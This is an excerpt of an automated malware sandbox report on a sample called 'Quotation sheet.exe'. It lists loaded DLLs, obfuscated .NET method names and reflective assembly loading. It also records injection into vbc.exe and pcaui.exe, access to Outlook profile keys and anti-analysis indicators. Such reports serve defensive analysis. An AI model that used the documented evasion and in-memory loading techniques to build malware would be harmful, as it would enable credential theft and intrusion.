                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Quotation sheet.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: Quotation sheet.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Quotation sheet.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Quotation sheet.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: pcaui.exe, 00000009.00000002.3972944908.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.000000000575C000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.0000000002B9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2755311109.000000000C8FC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdb source: vbc.exe, 00000007.00000002.2440631614.0000000005058000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000002.3972118198.000000000133B000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000003.2379322362.000000000131B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdb source: Quotation sheet.exe
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UsMxwwTDRUHSSD.exe, 00000008.00000000.2362478081.000000000091E000.00000002.00000001.01000000.0000000C.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3971822631.000000000091E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2456107078.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2453790948.0000000004C38000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdbSHA256 source: Quotation sheet.exe
                      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000009.00000003.2456107078.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2453790948.0000000004C38000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: vbc.pdb source: pcaui.exe, 00000009.00000002.3972944908.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.000000000575C000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.0000000002B9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2755311109.000000000C8FC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdbGCTL source: vbc.exe, 00000007.00000002.2440631614.0000000005058000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000002.3972118198.000000000133B000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000003.2379322362.000000000131B000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.Quotation sheet.exe.5c50000.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, z2xNW56F1ZH2jZTKon.cs.Net Code: C9lfi6UOWB System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, z2xNW56F1ZH2jZTKon.cs.Net Code: C9lfi6UOWB System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_059D939C pushfd ; retf 0_2_059DA921
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004030C0 push eax; ret 7_2_004030C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0040D0E4 push edx; retf 7_2_0040D0E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0040808C push esp; ret 7_2_00408097
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00417257 push 00000020h; iretd 7_2_00417259
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00417260 pushad ; retf 7_2_0041726B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00417A64 push ecx; ret 7_2_00417A78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041EA38 push eax; retf 7_2_0041EA4B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004172D4 pushad ; retf 7_2_0041726B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041EA8D push esp; retf 7_2_0041EA8E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00416797 push ds; iretd 7_2_004167A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053027FA pushad ; ret 7_2_053027F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0530225F pushad ; ret 7_2_053027F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053309AD push ecx; mov dword ptr [esp], ecx7_2_053309B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0530283D push eax; iretd 7_2_05302858
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0530135D push eax; iretd 7_2_05301369
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F927FA pushad ; ret 9_2_04F927F9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F9225F pushad ; ret 9_2_04F927F9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F9283D push eax; iretd 9_2_04F92858
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FC09AD push ecx; mov dword ptr [esp], ecx9_2_04FC09B6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F91368 push eax; iretd 9_2_04F91369
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D74211 pushad ; retf 9_2_02D741A8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D74194 push 00000020h; iretd 9_2_02D74196
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D7419D pushad ; retf 9_2_02D741A8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D749A1 push ecx; ret 9_2_02D749B5
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D80E8D push FFFFFFD3h; iretd 9_2_02D80E98
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D74E20 push 5390E75Dh; retn 7F36h9_2_02D74ECF
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D64FC9 push esp; ret 9_2_02D64FD4
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D736D4 push ds; iretd 9_2_02D736DF
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D77872 push ds; iretd 9_2_02D7788C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D7B9CA push esp; retf 9_2_02D7B9CB
                      Source: Quotation sheet.exeStatic PE information: section name: .text entropy: 7.730235064385923
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, XsIscADSqAfOW73RNQ.csHigh entropy of concatenated method names: 'Dt8A5uVl4l', 'jbgAs7D1dn', 'J7vAw9lZJY', 'DZnADmKfeu', 'uiGAhSquZI', 'bJPAkPwlZ3', 'hJbAx651t2', 't4JAbLamQ3', 'sWlAmedQI3', 'cl2AEoAQhL'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, cnsSNVMCUYZhqpICBr.csHigh entropy of concatenated method names: 'TFYu7lfLoe', 'nZ5u16xR1V', 'ryuAByNWjA', 'QeKAyjlCIn', 'rgWArNvIMW', 'kKPA4Jd4BN', 'PChALmgcDx', 'cyJAl4I0Bm', 'a6dAoTRyP2', 'xmFASGlbE0'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, dxnwfWo1hwohEfxBel.csHigh entropy of concatenated method names: 'KDBg9b54HI', 'VBSg3spwXi', 'twCgij0Hrt', 'qang5Gg6II', 'Qo3g7NAj93', 'FyKgsHpReh', 'oEYg1FI7pT', 'vFAgw7E7gq', 'll6gDoWYx3', 'jlogMNYsfm'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, l4AVtveKkOdZVCL4LB.csHigh entropy of concatenated method names: 'CDWPviF0Za', 'Uo3PVyXg6D', 'vtEPubsanL', 'zs3PgL1aXP', 'YfIP6MONkG', 'GkMuQT78fb', 'RKBuCswdjA', 'N1cuWxgn98', 'LRcunACgDZ', 'LeCutm3ym6'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, sp1lDdRRnrqqK3bpA0V.csHigh entropy of concatenated method names: 'mnUETFyasX', 'Rh1EzLqPad', 'z6EcUqqHYX', 'fnhcRlSp3j', 'xmOcFMJpx2', 'GtMcakhZhM', 'woWcfc48Zx', 'gBucvObXUN', 'v53cJHAONC', 'duWcVAVU97'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, z2xNW56F1ZH2jZTKon.csHigh entropy of concatenated method names: 'HWiav0ykQt', 'IQBaJtCWNU', 'B4aaVYBBUg', 'pS3aAxip2W', 'MUuau5jyuH', 'U7QaPXxLM3', 'N9OagA60dH', 'RSOa6kWaCV', 'BpKaKNPROS', 'jVHaXpArOq'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, qvsr92fm6GDDkDm7X7.csHigh entropy of concatenated method names: 'duIRgPUKR5', 'vS9R6CW8ki', 'gSqRXAfOW7', 'yRNRqQansS', 'HICRhBrX4A', 'gtvRkKkOdZ', 'SgqAF8reetDQ1fXeH7', 'Ely01JmLid1cbMACtS', 'oQeRRKB4yY', 'tgORa5uN9L'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, i79tYwzmrScsCg7BCX.csHigh entropy of concatenated method names: 'k59Esu4n50', 'gDCEwwgGxe', 'vTbEDbUTSk', 'P4NEe5B8WX', 'OwlEpcU54u', 'IPAEyFKNde', 'aQAErGJRF7', 'XGhE2chMDl', 'fbsE95uab2', 'JIrE3YCuXt'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, xFXs66RfPcaMhhhXaWe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wPGjmxuxKX', 'sQljEkoC5C', 'yBNjctBFj7', 'RYgjjiJwbP', 'YFXjZCg7BN', 'WiHjYOl8se', 'W7pj2QXXWT'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, PPUKR5wZS9CW8kiXFb.csHigh entropy of concatenated method names: 'cokVduJeCG', 'gIZVGruRCO', 'xmRVNV2uUh', 'm1tV8hush9', 'rK8VQc1yO5', 'LoHVCCnjyt', 'zyoVW1YWhv', 'OULVnKmpWN', 'eV5Vt2eP1l', 'sHBVT2yaJA'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, j6G0lPT5d0C3ab4ktI.csHigh entropy of concatenated method names: 'gjMEADBY0U', 'i39Euv0iNI', 'PSbEPDrBk9', 'f7REgOmqFt', 'ICOEmKl1oF', 'IiIE6kKmjC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, A2t7lBLdUoLTXrFHYD.csHigh entropy of concatenated method names: 'bjLgJbJUtv', 'U08gA0DFNA', 'HQ6gPr5YYi', 'GXJPTXSZHg', 'hGZPzIdvtD', 'ysbgUTpR3v', 'gddgR9t625', 'npmgFdJNGj', 'KY6gaKDCwT', 'FwRgfp4j1E'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, MlTvVWW80oPgjXVCSK.csHigh entropy of concatenated method names: 'ORamhTO2cT', 'T2kmx32LDw', 'xJwmmtT2Cu', 'wQfmchxIsq', 'mkFmZB5PS6', 'an8m2WKWE0', 'Dispose', 'tOBbJEMW28', 'ULubVsuQ5X', 'UnVbA7Ki3Z'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, BEm3b2t8ZooiFqvwgO.csHigh entropy of concatenated method names: 'OOtmeiktap', 'yK8mpxTyY8', 'ABYmBNiMah', 'niDmygUZU3', 'FF7mraZn7T', 'gixm43yOlo', 'Sc0mL4SAM6', 'RtPmlEMse9', 'wXtmomreJv', 'QSBmSXaURY'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, mmaSdf0UJqIPKo4hqT.csHigh entropy of concatenated method names: 'vNZHwRO4Y3', 'YN3HDuEn8j', 'RdDHetv0SI', 'I1MHpJUurH', 'UeXHy6Cjqv', 'AQOHrT5iI9', 'NsoHLG55Qk', 'Jv6Hl9UGl7', 'QhbHS5FCob', 'AsrHOr01lS'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, GwuH3CdsRsmh9OqFE9.csHigh entropy of concatenated method names: 'zY5hSs9GTA', 'gmkhInbkoD', 'YnMhd7Q8AK', 'YCshGW7hmD', 'rgAhpEgiXF', 'rRthBi13e6', 'AXGhySQsuU', 'lAehrBLlix', 'nnZh4HVY4K', 'UvbhLZrHr1'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, F1lwPVF41FEZb53qRh.csHigh entropy of concatenated method names: 'gjaiJiYCI', 'bhM5yH5GC', 'efls7PTBx', 'Ux11wvg9X', 'AJ2DCqT1b', 'e6KM1lhlD', 'nBf4eNcQRHG65Q7r6H', 'Wk4oaTCRf3AZFxj6DR', 'SE8bHGOU4', 'FvfEQHEb5'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, e9rxZJNgVmTvgJYWCE.csHigh entropy of concatenated method names: 'ToString', 'pnNkOvAdcq', 'nDfkpT6tbP', 'zYFkB7o5f9', 'y6oky89n6b', 'X63krD2inm', 'umyk48S7y4', 'K0AkLRTDqQ', 'EQQklOgqfB', 'd1Rko4VIPE'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, uSDqqFVdXg1Ch03CNt.csHigh entropy of concatenated method names: 'Dispose', 'MPgRtjXVCS', 'dCJFpSqoYl', 'P2ocKLlTVu', 'l3XRThK2FA', 'SDxRzfQSh2', 'ProcessDialogKey', 'wQ7FUEm3b2', 'TZoFRoiFqv', 'DgOFFg6G0l'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, CIDwwdCastJyY1nYgh.csHigh entropy of concatenated method names: 'iaKxn0RRT3', 'OCSxTwFcfG', 'WwObUYuwdP', 'RkxbRsbIpm', 'I3ExO4IK0p', 'NB3xIKrSvv', 'Dvvx0cZsGa', 'PZ6xd33Dvb', 'vfhxGcpvRR', 'iKIxNnIBfd'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, XsIscADSqAfOW73RNQ.csHigh entropy of concatenated method names: 'Dt8A5uVl4l', 'jbgAs7D1dn', 'J7vAw9lZJY', 'DZnADmKfeu', 'uiGAhSquZI', 'bJPAkPwlZ3', 'hJbAx651t2', 't4JAbLamQ3', 'sWlAmedQI3', 'cl2AEoAQhL'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, cnsSNVMCUYZhqpICBr.csHigh entropy of concatenated method names: 'TFYu7lfLoe', 'nZ5u16xR1V', 'ryuAByNWjA', 'QeKAyjlCIn', 'rgWArNvIMW', 'kKPA4Jd4BN', 'PChALmgcDx', 'cyJAl4I0Bm', 'a6dAoTRyP2', 'xmFASGlbE0'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, dxnwfWo1hwohEfxBel.csHigh entropy of concatenated method names: 'KDBg9b54HI', 'VBSg3spwXi', 'twCgij0Hrt', 'qang5Gg6II', 'Qo3g7NAj93', 'FyKgsHpReh', 'oEYg1FI7pT', 'vFAgw7E7gq', 'll6gDoWYx3', 'jlogMNYsfm'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, l4AVtveKkOdZVCL4LB.csHigh entropy of concatenated method names: 'CDWPviF0Za', 'Uo3PVyXg6D', 'vtEPubsanL', 'zs3PgL1aXP', 'YfIP6MONkG', 'GkMuQT78fb', 'RKBuCswdjA', 'N1cuWxgn98', 'LRcunACgDZ', 'LeCutm3ym6'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, sp1lDdRRnrqqK3bpA0V.csHigh entropy of concatenated method names: 'mnUETFyasX', 'Rh1EzLqPad', 'z6EcUqqHYX', 'fnhcRlSp3j', 'xmOcFMJpx2', 'GtMcakhZhM', 'woWcfc48Zx', 'gBucvObXUN', 'v53cJHAONC', 'duWcVAVU97'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, z2xNW56F1ZH2jZTKon.csHigh entropy of concatenated method names: 'HWiav0ykQt', 'IQBaJtCWNU', 'B4aaVYBBUg', 'pS3aAxip2W', 'MUuau5jyuH', 'U7QaPXxLM3', 'N9OagA60dH', 'RSOa6kWaCV', 'BpKaKNPROS', 'jVHaXpArOq'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, qvsr92fm6GDDkDm7X7.csHigh entropy of concatenated method names: 'duIRgPUKR5', 'vS9R6CW8ki', 'gSqRXAfOW7', 'yRNRqQansS', 'HICRhBrX4A', 'gtvRkKkOdZ', 'SgqAF8reetDQ1fXeH7', 'Ely01JmLid1cbMACtS', 'oQeRRKB4yY', 'tgORa5uN9L'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, i79tYwzmrScsCg7BCX.csHigh entropy of concatenated method names: 'k59Esu4n50', 'gDCEwwgGxe', 'vTbEDbUTSk', 'P4NEe5B8WX', 'OwlEpcU54u', 'IPAEyFKNde', 'aQAErGJRF7', 'XGhE2chMDl', 'fbsE95uab2', 'JIrE3YCuXt'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, xFXs66RfPcaMhhhXaWe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wPGjmxuxKX', 'sQljEkoC5C', 'yBNjctBFj7', 'RYgjjiJwbP', 'YFXjZCg7BN', 'WiHjYOl8se', 'W7pj2QXXWT'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, PPUKR5wZS9CW8kiXFb.csHigh entropy of concatenated method names: 'cokVduJeCG', 'gIZVGruRCO', 'xmRVNV2uUh', 'm1tV8hush9', 'rK8VQc1yO5', 'LoHVCCnjyt', 'zyoVW1YWhv', 'OULVnKmpWN', 'eV5Vt2eP1l', 'sHBVT2yaJA'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, j6G0lPT5d0C3ab4ktI.csHigh entropy of concatenated method names: 'gjMEADBY0U', 'i39Euv0iNI', 'PSbEPDrBk9', 'f7REgOmqFt', 'ICOEmKl1oF', 'IiIE6kKmjC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, A2t7lBLdUoLTXrFHYD.csHigh entropy of concatenated method names: 'bjLgJbJUtv', 'U08gA0DFNA', 'HQ6gPr5YYi', 'GXJPTXSZHg', 'hGZPzIdvtD', 'ysbgUTpR3v', 'gddgR9t625', 'npmgFdJNGj', 'KY6gaKDCwT', 'FwRgfp4j1E'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, MlTvVWW80oPgjXVCSK.csHigh entropy of concatenated method names: 'ORamhTO2cT', 'T2kmx32LDw', 'xJwmmtT2Cu', 'wQfmchxIsq', 'mkFmZB5PS6', 'an8m2WKWE0', 'Dispose', 'tOBbJEMW28', 'ULubVsuQ5X', 'UnVbA7Ki3Z'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, BEm3b2t8ZooiFqvwgO.csHigh entropy of concatenated method names: 'OOtmeiktap', 'yK8mpxTyY8', 'ABYmBNiMah', 'niDmygUZU3', 'FF7mraZn7T', 'gixm43yOlo', 'Sc0mL4SAM6', 'RtPmlEMse9', 'wXtmomreJv', 'QSBmSXaURY'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, mmaSdf0UJqIPKo4hqT.csHigh entropy of concatenated method names: 'vNZHwRO4Y3', 'YN3HDuEn8j', 'RdDHetv0SI', 'I1MHpJUurH', 'UeXHy6Cjqv', 'AQOHrT5iI9', 'NsoHLG55Qk', 'Jv6Hl9UGl7', 'QhbHS5FCob', 'AsrHOr01lS'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, GwuH3CdsRsmh9OqFE9.csHigh entropy of concatenated method names: 'zY5hSs9GTA', 'gmkhInbkoD', 'YnMhd7Q8AK', 'YCshGW7hmD', 'rgAhpEgiXF', 'rRthBi13e6', 'AXGhySQsuU', 'lAehrBLlix', 'nnZh4HVY4K', 'UvbhLZrHr1'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, F1lwPVF41FEZb53qRh.csHigh entropy of concatenated method names: 'gjaiJiYCI', 'bhM5yH5GC', 'efls7PTBx', 'Ux11wvg9X', 'AJ2DCqT1b', 'e6KM1lhlD', 'nBf4eNcQRHG65Q7r6H', 'Wk4oaTCRf3AZFxj6DR', 'SE8bHGOU4', 'FvfEQHEb5'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, e9rxZJNgVmTvgJYWCE.csHigh entropy of concatenated method names: 'ToString', 'pnNkOvAdcq', 'nDfkpT6tbP', 'zYFkB7o5f9', 'y6oky89n6b', 'X63krD2inm', 'umyk48S7y4', 'K0AkLRTDqQ', 'EQQklOgqfB', 'd1Rko4VIPE'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, uSDqqFVdXg1Ch03CNt.csHigh entropy of concatenated method names: 'Dispose', 'MPgRtjXVCS', 'dCJFpSqoYl', 'P2ocKLlTVu', 'l3XRThK2FA', 'SDxRzfQSh2', 'ProcessDialogKey', 'wQ7FUEm3b2', 'TZoFRoiFqv', 'DgOFFg6G0l'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, CIDwwdCastJyY1nYgh.csHigh entropy of concatenated method names: 'iaKxn0RRT3', 'OCSxTwFcfG', 'WwObUYuwdP', 'RkxbRsbIpm', 'I3ExO4IK0p', 'NB3xIKrSvv', 'Dvvx0cZsGa', 'PZ6xd33Dvb', 'vfhxGcpvRR', 'iKIxNnIBfd'

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: Quotation sheet.exe PID: 5448, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: 19E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: 3370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: 5370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: 94E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: A4E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: A6E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeMemory allocated: B6E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0537096E rdtsc 7_2_0537096E
                      Source: C:\Users\user\Desktop\Quotation sheet.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3290Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 486Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\pcaui.exeAPI coverage: 2.6 %
